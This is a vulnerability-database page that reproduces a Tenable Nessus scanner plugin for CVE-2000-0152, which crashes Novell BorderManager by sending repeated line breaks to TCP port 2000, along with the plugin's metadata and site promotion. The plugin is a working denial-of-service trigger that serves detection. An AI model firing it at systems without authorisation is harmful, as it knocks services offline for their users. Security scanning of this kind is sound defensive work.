| Reporter | Title | Published | Views | Family All 4 |
|---|---|---|---|---|
| CVE-2000-0152 | 22 Mar 200005:00 | – | cve | |
| CVE-2000-0152 | 22 Mar 200005:00 | – | cvelist | |
| EUVD-2000-0151 | 7 Oct 202500:30 | – | euvd | |
| CVE-2000-0152 | 30 Mar 200005:00 | – | nvd |
| Source | Link |
|---|---|
| cve | www.cve.mitre.org/cgi-bin/cvename.cgi |
#
# (C) Tenable Network Security, Inc.
#
include( 'compat.inc' );
if(description)
{
script_id(10163);
script_version ("1.21");
script_cve_id("CVE-2000-0152");
script_name(english:"Novell BorderManager Port 2000 Telnet DoS");
script_summary(english:"Crashes the remote Border Manager");
script_set_attribute(
attribute:'synopsis',
value:'The remote service is vulnerable to a denial of service.'
);
script_set_attribute(
attribute:'description',
value:"The port 2000 is open, and Novell BorderManager
*might* be listening on it.
There is a denial of service attack that allows
an intruder to make a Novell BorderManager 3.5 slowly
die.
If you see an error message on this computer telling
you 'Short Term Memory Allocator is out of Memory'
then you are vulnerable to this attack.
An attacker may use this flaw to prevent this
service from doing its job and to prevent the
user of this station to work on it.
*** If there is no error message whatsoever on this
*** computer, then this is likely a false positive."
);
script_set_attribute(
attribute:'solution',
value: "Contact Novell and ask for a patch or filter incoming TCP connections to port 2000."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2000/02/09");
script_set_attribute(attribute:"vuln_publication_date", value: "2000/02/04");
script_set_attribute(attribute:"patch_publication_date", value: "2000/02/17");
script_cvs_date("Date: 2018/07/16 14:09:13");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:novell:bordermanager");
script_end_attributes();
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");
script_family(english:"Firewalls");
script_require_ports(2000);
exit(0);
}
#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
if (! get_port_state(2000)) exit(0);
soc = open_sock_tcp(2000);
if (! soc) exit(1);
msg = crap(data:'\r\n', length:20);
send(socket:soc, data:msg);
close(soc);
if (service_is_dead(port: 2000) > 0)
security_warning(2000);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation